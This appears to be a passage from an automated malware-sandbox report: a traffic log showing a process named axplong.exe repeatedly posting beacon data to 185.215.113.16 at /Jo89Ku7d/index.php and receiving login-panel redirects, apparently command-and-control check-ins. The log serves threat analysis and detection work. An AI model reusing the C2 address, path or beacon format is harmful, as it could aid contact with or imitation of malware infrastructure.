                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:56.004493952 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    47 | 192.168.2.8 | 49759 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:56.113441944 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:56.828773022 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:56.829586029 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:57.061820030 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    48 | 192.168.2.8 | 49760 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:57.176048040 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:57.868886948 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:57.869610071 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:58.091711998 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    49 | 192.168.2.8 | 49761 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:58.287947893 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:59.003110886 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:59.004019022 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:59.242244005 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    50 | 192.168.2.8 | 49762 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:43:59.365015984 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:00.055454016 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:00.056695938 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:00.281776905 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    51 | 192.168.2.8 | 49763 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:00.396591902 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:01.106066942 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:01.106846094 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:01.336932898 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:01 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    52 | 192.168.2.8 | 49764 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:01.678165913 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:02.220508099 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:02.221329927 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:02.446058035 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    53 | 192.168.2.8 | 49765 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:02.566796064 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:03.281410933 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:03.286047935 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:03.529601097 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    54 | 192.168.2.8 | 49766 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:03.648351908 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:04.366070032 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:04.376144886 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:04.608016968 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    55 | 192.168.2.8 | 49767 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:04.785007954 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:05.474082947 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    56 | 192.168.2.8 | 49768 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:05.483377934 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:06.196568012 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    57 | 192.168.2.8 | 49769 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:06.318288088 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:07.031286001 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    58 | 192.168.2.8 | 49770 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:07.039694071 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:07.761219025 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    59 | 192.168.2.8 | 49771 | 185.215.113.16 | 80 | 7648 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:44:07.887510061 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:44:08.593796015 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:44:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:44:08.601042032 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:44:08.835089922 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
